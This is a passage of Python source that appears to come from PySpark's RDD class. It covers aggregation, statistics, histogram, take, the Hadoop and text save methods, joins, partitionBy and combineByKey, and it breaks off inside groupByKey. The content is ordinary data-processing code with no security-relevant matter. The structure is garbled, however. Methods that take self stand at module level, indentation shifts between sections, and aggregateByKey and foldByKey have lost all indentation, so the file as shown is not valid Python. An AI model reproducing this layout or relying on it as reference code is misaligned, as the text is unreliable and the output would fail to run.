            .reduceByKey(combOp, curNumPartitions) \
            .values()

    # Final fan-in of whatever partial results remain.
    return partiallyAggregated.reduce(combOp)
def max(self, key=None):
    """
    Find the maximum item in this RDD.

    :param key: A function used to generate key for comparing

    >>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
    >>> rdd.max()
    43.0
    >>> rdd.max(key=str)
    5.0
    """
    # Pairwise comparison, optionally through the user-supplied key.
    comparator = max if key is None else (lambda a, b: max(a, b, key=key))
    return self.reduce(comparator)
def min(self, key=None):
    """
    Find the minimum item in this RDD.

    :param key: A function used to generate key for comparing

    >>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
    >>> rdd.min()
    2.0
    >>> rdd.min(key=str)
    10.0
    """
    # Pairwise comparison, optionally through the user-supplied key.
    comparator = min if key is None else (lambda a, b: min(a, b, key=key))
    return self.reduce(comparator)
def sum(self):
    """
    Add up the elements in this RDD.

    >>> sc.parallelize([1.0, 2.0, 3.0]).sum()
    6.0
    """
    # Sum within each partition first, then fold the partial sums.
    partial_sums = self.mapPartitions(lambda part: [sum(part)])
    return partial_sums.fold(0, operator.add)
def count(self):
    """
    Return the number of elements in this RDD.

    >>> sc.parallelize([2, 3, 4]).count()
    3
    """
    def countPartition(iterator):
        # Count the rows of one partition.
        n = 0
        for _ in iterator:
            n += 1
        return [n]
    return self.mapPartitions(countPartition).sum()
def stats(self):
    """
    Return a L{StatCounter} object that captures the mean, variance
    and count of the RDD's elements in one operation.
    """
    # Build one StatCounter per partition, then merge them pairwise.
    counters = self.mapPartitions(lambda it: [StatCounter(it)])
    return counters.reduce(lambda left, right: left.mergeStats(right))
def histogram(self, buckets):
    """
    Compute a histogram using the provided buckets. The buckets
    are all open to the right except for the last which is closed.
    e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
    which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
    and 50 we would have a histogram of 1,0,1.

    If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
    this can be switched from an O(log n) inseration to O(1) per
    element (where n is the number of buckets).

    Buckets must be sorted, not contain any duplicates, and have
    at least two elements.

    If `buckets` is a number, it will generate buckets which are
    evenly spaced between the minimum and maximum of the RDD. For
    example, if the min value is 0 and the max is 100, given `buckets`
    as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
    be at least 1. An exception is raised if the RDD contains infinity.
    If the elements in the RDD do not vary (max == min), a single bucket
    will be used.

    The return value is a tuple of buckets and histogram.

    >>> rdd = sc.parallelize(range(51))
    >>> rdd.histogram(2)
    ([0, 25, 50], [25, 26])
    >>> rdd.histogram([0, 5, 25, 50])
    ([0, 5, 25, 50], [5, 20, 26])
    >>> rdd.histogram([0, 15, 30, 45, 60])  # evenly spaced buckets
    ([0, 15, 30, 45, 60], [15, 15, 15, 6])
    >>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
    >>> rdd.histogram(("a", "b", "c"))
    (('a', 'b', 'c'), [2, 2])
    """
    if isinstance(buckets, int):
        # Caller gave a bucket *count*: derive evenly spaced boundaries
        # from the RDD's min and max.
        if buckets < 1:
            raise ValueError("number of buckets must be >= 1")

        # filter out non-comparable elements
        def comparable(x):
            if x is None:
                return False
            if type(x) is float and isnan(x):
                return False
            return True

        filtered = self.filter(comparable)

        # faster than stats()
        def minmax(a, b):
            return min(a[0], b[0]), max(a[1], b[1])
        try:
            minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
        except TypeError as e:
            # reduce() raises "Can not reduce() empty RDD"; translate that
            # into a bucket-specific error but re-raise anything else.
            if " empty " in str(e):
                raise ValueError("can not generate buckets from empty RDD")
            raise

        if minv == maxv or buckets == 1:
            # Degenerate range: everything falls into one bucket.
            return [minv, maxv], [filtered.count()]

        try:
            inc = (maxv - minv) / buckets
        except TypeError:
            raise TypeError("Can not generate buckets with non-number in RDD")

        if isinf(inc):
            raise ValueError("Can not generate buckets with infinite value")

        # keep them as integer if possible
        inc = int(inc)
        if inc * buckets != maxv - minv:
            inc = (maxv - minv) * 1.0 / buckets

        buckets = [i * inc + minv for i in range(buckets)]
        buckets.append(maxv)  # fix accumulated error
        even = True

    elif isinstance(buckets, (list, tuple)):
        # Caller gave explicit boundaries: validate them.
        if len(buckets) < 2:
            raise ValueError("buckets should have more than one value")

        if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
            raise ValueError("can not have None or NaN in buckets")

        if sorted(buckets) != list(buckets):
            raise ValueError("buckets should be sorted")

        if len(set(buckets)) != len(buckets):
            raise ValueError("buckets should not contain duplicated values")

        minv = buckets[0]
        maxv = buckets[-1]
        even = False
        inc = None
        try:
            steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
        except TypeError:
            pass  # objects in buckets do not support '-'
        else:
            # Equal step sizes allow the O(1) arithmetic index below.
            if max(steps) - min(steps) < 1e-10:  # handle precision errors
                even = True
                inc = (maxv - minv) / (len(buckets) - 1)

    else:
        raise TypeError("buckets should be a list or tuple or number(int or long)")

    def histogram(iterator):
        # Per-partition counts; one counter per boundary (trimmed below).
        counters = [0] * len(buckets)
        for i in iterator:
            # Skip None/NaN and values outside [minv, maxv].
            if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
                continue
            # O(1) index for even spacing, O(log n) bisect otherwise.
            t = (int((i - minv) / inc) if even
                 else bisect.bisect_right(buckets, i) - 1)
            counters[t] += 1
        # add last two together
        last = counters.pop()
        counters[-1] += last
        return [counters]

    def mergeCounters(a, b):
        return [i + j for i, j in zip(a, b)]

    return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
    """
    Compute the mean of this RDD's elements.

    >>> sc.parallelize([1, 2, 3]).mean()
    2.0
    """
    summary = self.stats()
    return summary.mean()
def variance(self):
    """
    Compute the variance of this RDD's elements.

    >>> sc.parallelize([1, 2, 3]).variance()
    0.666...
    """
    summary = self.stats()
    return summary.variance()
def stdev(self):
    """
    Compute the standard deviation of this RDD's elements.

    >>> sc.parallelize([1, 2, 3]).stdev()
    0.816...
    """
    summary = self.stats()
    return summary.stdev()
def sampleStdev(self):
    """
    Compute the sample standard deviation of this RDD's elements (which
    corrects for bias in estimating the standard deviation by dividing by
    N-1 instead of N).

    >>> sc.parallelize([1, 2, 3]).sampleStdev()
    1.0
    """
    summary = self.stats()
    return summary.sampleStdev()
def sampleVariance(self):
    """
    Compute the sample variance of this RDD's elements (which corrects
    for bias in estimating the variance by dividing by N-1 instead of N).

    >>> sc.parallelize([1, 2, 3]).sampleVariance()
    1.0
    """
    summary = self.stats()
    return summary.sampleVariance()
def countByValue(self):
    """
    Return the count of each unique value in this RDD as a dictionary of
    (value, count) pairs.

    >>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
    [(1, 2), (2, 3)]
    """
    def countPartition(iterator):
        # Tally values within a single partition.
        tally = defaultdict(int)
        for item in iterator:
            tally[item] += 1
        yield tally

    def mergeMaps(left, right):
        # Fold the right tally into the left one.
        for value, cnt in right.items():
            left[value] += cnt
        return left
    return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
    """
    Get the top N elements from an RDD.

    .. note:: This method should only be used if the resulting array is expected
        to be small, as all the data is loaded into the driver's memory.

    .. note:: It returns the list sorted in descending order.

    >>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
    [12]
    >>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
    [6, 5]
    >>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
    [4, 3, 2]
    """
    def topOfPartition(iterator):
        # Per-partition candidates: at most num largest elements.
        yield heapq.nlargest(num, iterator, key=key)

    return self.mapPartitions(topOfPartition).reduce(
        lambda left, right: heapq.nlargest(num, left + right, key=key))
def takeOrdered(self, num, key=None):
    """
    Get the N elements from an RDD ordered in ascending order or as
    specified by the optional key function.

    .. note:: this method should only be used if the resulting array is expected
        to be small, as all the data is loaded into the driver's memory.

    >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
    [1, 2, 3, 4, 5, 6]
    >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
    [10, 9, 7, 6, 5, 4]
    """
    def smallestOfPartition(iterator):
        # Per-partition candidates: at most num smallest elements.
        return [heapq.nsmallest(num, iterator, key)]

    return self.mapPartitions(smallestOfPartition).reduce(
        lambda left, right: heapq.nsmallest(num, left + right, key))
def take(self, num):
    """
    Take the first num elements of the RDD.

    It works by first scanning one partition, and use the results from
    that partition to estimate the number of additional partitions needed
    to satisfy the limit.

    Translated from the Scala implementation in RDD#take().

    .. note:: this method should only be used if the resulting array is expected
        to be small, as all the data is loaded into the driver's memory.

    >>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
    [2, 3]
    >>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
    [2, 3, 4, 5, 6]
    >>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
    [91, 92, 93]
    """
    items = []
    totalParts = self.getNumPartitions()
    partsScanned = 0

    while len(items) < num and partsScanned < totalParts:
        # The number of partitions to try in this iteration.
        # It is ok for this number to be greater than totalParts because
        # we actually cap it at totalParts in runJob.
        numPartsToTry = 1
        if partsScanned > 0:
            # If we didn't find any rows after the previous iteration,
            # quadruple and retry. Otherwise, interpolate the number of
            # partitions we need to try, but overestimate it by 50%.
            # We also cap the estimation in the end.
            if len(items) == 0:
                numPartsToTry = partsScanned * 4
            else:
                # the first paramter of max is >=1 whenever partsScanned >= 2
                numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
                numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)

        # Still-needed element count; captured by the closure below.
        left = num - len(items)

        def takeUpToNumLeft(iterator):
            # Pull at most `left` elements from one partition.
            iterator = iter(iterator)
            taken = 0
            while taken < left:
                try:
                    yield next(iterator)
                except StopIteration:
                    return
                taken += 1

        # Run the job only on the next batch of partition indices.
        p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
        res = self.context.runJob(self, takeUpToNumLeft, p)

        items += res
        partsScanned += numPartsToTry

    return items[:num]
def first(self):
    """
    Return the first element in this RDD.

    >>> sc.parallelize([2, 3, 4]).first()
    2
    >>> sc.parallelize([]).first()
    Traceback (most recent call last):
        ...
    ValueError: RDD is empty
    """
    taken = self.take(1)
    if not taken:
        raise ValueError("RDD is empty")
    return taken[0]
def isEmpty(self):
    """
    Returns true if and only if the RDD contains no elements at all.

    .. note:: an RDD may be empty even when it has at least 1 partition.

    >>> sc.parallelize([]).isEmpty()
    True
    >>> sc.parallelize([1]).isEmpty()
    False
    """
    # No partitions at all, or partitions that yield no element.
    if self.getNumPartitions() == 0:
        return True
    return len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
    """
    Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
    system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
    converted for output using either user specified converters or, by default,
    L{org.apache.spark.api.python.JavaToWritableConverter}.

    :param conf: Hadoop job configuration, passed in as a dict
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    """
    jconf = self.ctx._dictToJavaMap(conf)
    pickledRDD = self._pickled()
    # Final True selects the new-API (mapreduce) path; compare the False
    # passed by saveAsHadoopDataset for the old (mapred) API.
    self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
                                                keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
                           keyConverter=None, valueConverter=None, conf=None):
    """
    Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
    system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
    will be inferred if not specified. Keys and values are converted for output using either
    user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
    C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
    of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.

    :param path: path to Hadoop file
    :param outputFormatClass: fully qualified classname of Hadoop OutputFormat
           (e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.IntWritable", None by default)
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.Text", None by default)
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    :param conf: Hadoop job configuration, passed in as a dict (None by default)
    """
    jconf = self.ctx._dictToJavaMap(conf)
    # Re-pickle so the JVM side receives a batched, pickled representation.
    pickledRDD = self._pickled()
    self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
                                                   outputFormatClass,
                                                   keyClass, valueClass,
                                                   keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
    """
    Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
    system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
    converted for output using either user specified converters or, by default,
    L{org.apache.spark.api.python.JavaToWritableConverter}.

    :param conf: Hadoop job configuration, passed in as a dict
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    """
    jconf = self.ctx._dictToJavaMap(conf)
    pickledRDD = self._pickled()
    # Final False selects the old-API (mapred) path; compare the True
    # passed by saveAsNewAPIHadoopDataset for the new (mapreduce) API.
    self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
                                                keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
                     keyConverter=None, valueConverter=None, conf=None,
                     compressionCodecClass=None):
    """
    Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
    system, using the old Hadoop OutputFormat API (mapred package). Key and value types
    will be inferred if not specified. Keys and values are converted for output using either
    user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
    C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
    of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.

    :param path: path to Hadoop file
    :param outputFormatClass: fully qualified classname of Hadoop OutputFormat
           (e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.IntWritable", None by default)
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.Text", None by default)
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    :param conf: (None by default)
    :param compressionCodecClass: (None by default)
    """
    jconf = self.ctx._dictToJavaMap(conf)
    # Re-pickle so the JVM side receives a batched, pickled representation.
    pickledRDD = self._pickled()
    self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
                                             outputFormatClass,
                                             keyClass, valueClass,
                                             keyConverter, valueConverter,
                                             jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
    """
    Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
    system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
    RDD's key and value types. The mechanism is as follows:

        1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
        2. Keys and values of this Java RDD are converted to Writables and written out.

    :param path: path to sequence file
    :param compressionCodecClass: (None by default)
    """
    # Re-pickle so the JVM side receives a batched, pickled representation.
    pickledRDD = self._pickled()
    self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
                                               path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
    """
    Save this RDD as a SequenceFile of serialized objects. The serializer
    used is L{pyspark.serializers.PickleSerializer}, default batch size
    is 10.

    >>> tmpFile = NamedTemporaryFile(delete=True)
    >>> tmpFile.close()
    >>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
    >>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
    ['1', '2', 'rdd', 'spark']
    """
    # batchSize == 0 means "let the serializer pick the batch size".
    pickler = PickleSerializer()
    ser = (AutoBatchedSerializer(pickler) if batchSize == 0
           else BatchedSerializer(pickler, batchSize))
    self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
    """
    Save this RDD as a text file, using string representations of elements.

    @param path: path to text file
    @param compressionCodecClass: (None by default) string i.e.
        "org.apache.hadoop.io.compress.GzipCodec"

    >>> tempFile = NamedTemporaryFile(delete=True)
    >>> tempFile.close()
    >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
    >>> from fileinput import input
    >>> from glob import glob
    >>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
    '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'

    Empty lines are tolerated when saving to text files.

    >>> tempFile2 = NamedTemporaryFile(delete=True)
    >>> tempFile2.close()
    >>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
    >>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
    '\\n\\n\\nbar\\nfoo\\n'

    Using compressionCodecClass

    >>> tempFile3 = NamedTemporaryFile(delete=True)
    >>> tempFile3.close()
    >>> codec = "org.apache.hadoop.io.compress.GzipCodec"
    >>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
    >>> from fileinput import input, hook_compressed
    >>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
    >>> b''.join(result).decode('utf-8')
    u'bar\\nfoo\\n'
    """
    def func(split, iterator):
        # Normalize every element to UTF-8 bytes: stringify non-strings,
        # encode text; bytes pass through untouched.
        for x in iterator:
            if not isinstance(x, (unicode, bytes)):
                x = unicode(x)
            if isinstance(x, unicode):
                x = x.encode("utf-8")
            yield x
    keyed = self.mapPartitionsWithIndex(func)
    # Elements are already raw bytes; skip Python-side serialization.
    keyed._bypass_serializer = True
    if compressionCodecClass:
        compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
        keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
    else:
        keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
    """
    Return the key-value pairs in this RDD to the master as a dictionary.

    .. note:: this method should only be used if the resulting data is expected
        to be small, as all the data is loaded into the driver's memory.

    >>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
    >>> m[1]
    2
    >>> m[3]
    4
    """
    pairs = self.collect()
    return dict(pairs)
def keys(self):
    """
    Return an RDD with the keys of each tuple.

    >>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
    >>> m.collect()
    [1, 3]
    """
    return self.map(lambda kv: kv[0])
def values(self):
    """
    Return an RDD with the values of each tuple.

    >>> m = sc.parallelize([(1, 2), (3, 4)]).values()
    >>> m.collect()
    [2, 4]
    """
    return self.map(lambda kv: kv[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
    """
    Merge the values for each key using an associative and commutative reduce function.

    This will also perform the merging locally on each mapper before
    sending results to a reducer, similarly to a "combiner" in MapReduce.

    Output will be partitioned with C{numPartitions} partitions, or
    the default parallelism level if C{numPartitions} is not specified.
    Default partitioner is hash-partition.

    >>> from operator import add
    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> sorted(rdd.reduceByKey(add).collect())
    [('a', 2), ('b', 1)]
    """
    def identity(value):
        # Each first value for a key is its own combiner.
        return value
    return self.combineByKey(identity, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
    """
    Merge the values for each key using an associative and commutative reduce function, but
    return the results immediately to the master as a dictionary.

    This will also perform the merging locally on each mapper before
    sending results to a reducer, similarly to a "combiner" in MapReduce.

    >>> from operator import add
    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> sorted(rdd.reduceByKeyLocally(add).items())
    [('a', 2), ('b', 1)]
    """
    func = fail_on_stopiteration(func)

    def reducePartition(iterator):
        # Fold each partition into a key -> reduced-value dict.
        partial = {}
        for key, value in iterator:
            partial[key] = func(partial[key], value) if key in partial else value
        yield partial

    def mergeMaps(left, right):
        # Merge the right dict into the left one, reducing on collisions.
        for key, value in right.items():
            left[key] = func(left[key], value) if key in left else value
        return left
    return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
    """
    Count the number of elements for each key, and return the result to the
    master as a dictionary.

    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> sorted(rdd.countByKey().items())
    [('a', 2), ('b', 1)]
    """
    # Project out the keys and tally occurrences of each.
    return self.keys().countByValue()
def join(self, other, numPartitions=None):
    """
    Return an RDD containing all pairs of elements with matching keys in
    C{self} and C{other}.

    Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
    (k, v1) is in C{self} and (k, v2) is in C{other}.

    Performs a hash join across the cluster.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2), ("a", 3)])
    >>> sorted(x.join(y).collect())
    [('a', (1, 2)), ('a', (1, 3))]
    """
    # Delegates to the shared Python-side hash-join helper.
    return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
    """
    Perform a left outer join of C{self} and C{other}.

    For each element (k, v) in C{self}, the resulting RDD will either
    contain all pairs (k, (v, w)) for w in C{other}, or the pair
    (k, (v, None)) if no elements in C{other} have key k.

    Hash-partitions the resulting RDD into the given number of partitions.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2)])
    >>> sorted(x.leftOuterJoin(y).collect())
    [('a', (1, 2)), ('b', (4, None))]
    """
    # Delegates to the shared Python-side hash-join helper.
    return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
    """
    Perform a right outer join of C{self} and C{other}.

    For each element (k, w) in C{other}, the resulting RDD will either
    contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
    if no elements in C{self} have key k.

    Hash-partitions the resulting RDD into the given number of partitions.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2)])
    >>> sorted(y.rightOuterJoin(x).collect())
    [('a', (2, 1)), ('b', (None, 4))]
    """
    # Delegates to the shared Python-side hash-join helper.
    return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
    """
    Perform a full outer join of C{self} and C{other}.

    For each element (k, v) in C{self}, the resulting RDD will either
    contain all pairs (k, (v, w)) for w in C{other}, or the pair
    (k, (v, None)) if no elements in C{other} have key k.

    Similarly, for each element (k, w) in C{other}, the resulting RDD will
    either contain all pairs (k, (v, w)) for v in C{self}, or the pair
    (k, (None, w)) if no elements in C{self} have key k.

    Hash-partitions the resulting RDD into the given number of partitions.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2), ("c", 8)])
    >>> sorted(x.fullOuterJoin(y).collect())
    [('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
    """
    # Delegates to the shared Python-side hash-join helper.
    return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
    """
    Return a copy of the RDD partitioned using the specified partitioner.

    >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
    >>> sets = pairs.partitionBy(2).glom().collect()
    >>> len(set(sets[0]).intersection(set(sets[1])))
    0
    """
    if numPartitions is None:
        numPartitions = self._defaultReducePartitions()
    partitioner = Partitioner(numPartitions, partitionFunc)
    # Already partitioned the same way: nothing to do.
    if self.partitioner == partitioner:
        return self

    # Transferring O(n) objects to Java is too expensive.
    # Instead, we'll form the hash buckets in Python,
    # transferring O(numPartitions) objects to Java.
    # Each object is a (splitNumber, [objects]) pair.
    # In order to avoid too huge objects, the objects are
    # grouped into chunks.
    outputSerializer = self.ctx._unbatched_serializer

    # Spill threshold: half the configured Python worker memory.
    limit = (_parse_memory(self.ctx._conf.get(
        "spark.python.worker.memory", "512m")) / 2)

    def add_shuffle_key(split, iterator):
        buckets = defaultdict(list)
        c, batch = 0, min(10 * numPartitions, 1000)

        for k, v in iterator:
            buckets[partitionFunc(k) % numPartitions].append((k, v))
            c += 1

            # check used memory and avg size of chunk of objects
            if (c % 1000 == 0 and get_used_memory() > limit
                    or c > batch):
                # Flush every bucket as a (packed split id, serialized
                # chunk) pair, freeing the bucket as we go.
                n, size = len(buckets), 0
                for split in list(buckets.keys()):
                    yield pack_long(split)
                    d = outputSerializer.dumps(buckets[split])
                    del buckets[split]
                    yield d
                    size += len(d)

                avg = int(size / n) >> 20
                # let 1M < avg < 10M
                if avg < 1:
                    batch *= 1.5
                elif avg > 10:
                    batch = max(int(batch / 1.5), 1)
                c = 0

        # Flush whatever remains after the input is exhausted.
        for split, items in buckets.items():
            yield pack_long(split)
            yield outputSerializer.dumps(items)

    keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
    # Stream already-serialized chunks straight through to the JVM.
    keyed._bypass_serializer = True
    with SCCallSiteSync(self.context) as css:
        pairRDD = self.ctx._jvm.PairwiseRDD(
            keyed._jrdd.rdd()).asJavaPairRDD()
        jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
                                                       id(partitionFunc))
    jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
    rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
    rdd.partitioner = partitioner
    return rdd
# TODO: add control over map-side aggregation
    def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
                     numPartitions=None, partitionFunc=portable_hash):
        """
        Generic function to combine the elements for each key using a custom
        set of aggregation functions.

        Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
        type" C.

        Users provide three functions:

            - C{createCombiner}, which turns a V into a C (e.g., creates
              a one-element list)
            - C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
              a list)
            - C{mergeCombiners}, to combine two C's into a single one (e.g., merges
              the lists)

        To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
        modify and return their first argument instead of creating a new C.

        In addition, users can control the partitioning of the output RDD.

        .. note:: V and C can be different -- for example, one might group an RDD of type
            (Int, Int) into an RDD of type (Int, List[Int]).

        >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
        >>> def to_list(a):
        ...     return [a]
        ...
        >>> def append(a, b):
        ...     a.append(b)
        ...     return a
        ...
        >>> def extend(a, b):
        ...     a.extend(b)
        ...     return a
        ...
        >>> sorted(x.combineByKey(to_list, append, extend).collect())
        [('a', [1, 2]), ('b', [1])]
        """
        if numPartitions is None:
            numPartitions = self._defaultReducePartitions()
        serializer = self.ctx.serializer
        # Per-worker memory budget for the external (spilling) merger.
        memory = self._memory_limit()
        agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
        def combineLocally(iterator):
            # Map-side combine: merge raw values within one partition before
            # the shuffle, using 90% of the memory limit as headroom.
            merger = ExternalMerger(agg, memory * 0.9, serializer)
            merger.mergeValues(iterator)
            return merger.items()
        locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
        shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
        def _mergeCombiners(iterator):
            # Reduce-side combine: merge the per-partition combiners that the
            # shuffle delivered for each key.
            merger = ExternalMerger(agg, memory, serializer)
            merger.mergeCombiners(iterator)
            return merger.items()
        return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
    def _memory_limit(self):
        # Memory budget used by external (spilling) aggregation, parsed from
        # the "spark.python.worker.memory" config (default "512m"); units are
        # whatever _parse_memory returns — confirm against its definition.
        return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
    def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
        """
        Group the values for each key in the RDD into a single sequence.
        Hash-partitions the resulting RDD with numPartitions partitions.

        .. note:: If you are grouping in order to perform an aggregation (such as a
            sum or average) over each key, using reduceByKey or aggregateByKey will
            provide much better performance.

        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.groupByKey().mapValues(len).collect())
        [('a', 2), ('b', 1)]
        >>> sorted(rdd.groupByKey().mapValues(list).collect())
